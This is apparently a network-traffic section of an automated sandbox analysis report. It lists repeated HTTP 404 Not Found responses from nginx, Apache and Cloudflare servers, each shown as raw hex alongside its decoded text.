Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:01:58 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:02:00 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:02:20 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66938482-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:02:23 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66938482-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:02:26 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66938482-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:02:29 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66938482-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 08:02:34 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 08:02:37 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 08:02:39 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 08:02:42 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 08:02:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MAeXZPhhwlJZEX0ki2SdmtD%2FS%2BW%2FYs0AxCGKYC4hVv1W4agSiKPE45WSOSdpHuDOMgpG6i9gdxfhW2iJ39JdO8BW4sMRxd0Yo7zVs7fZp%2BPfbzNvekUkzRVkMQUv%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d0d5479fe46333c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 08:02:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5mF0pysan1wHyGdaei4MLHNDHGquJntb%2FJV0OYYqcHU%2F53fNfGZ9C%2B%2F9hIhmoC4QuHUj9kbzeMPWMnqG8f8CDuxweqCAFBax6LGaRTpkeb%2BjZYERY6NsfeFWP3oRcw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d0d548a696141bd-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 08:02:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fmc6lsHA2KjzXLXGS7bpusdCkkBJrmV0UT4wiMo3Xeabw66sSxgJiH%2F0l%2BLQh7g%2FncmrJTnxFLmvLCPrhxINAvYQjkvgDuTkJ1iZqYBcnxUBveFQMKcr5oT2%2BaKzGQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d0d549ace838cee-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
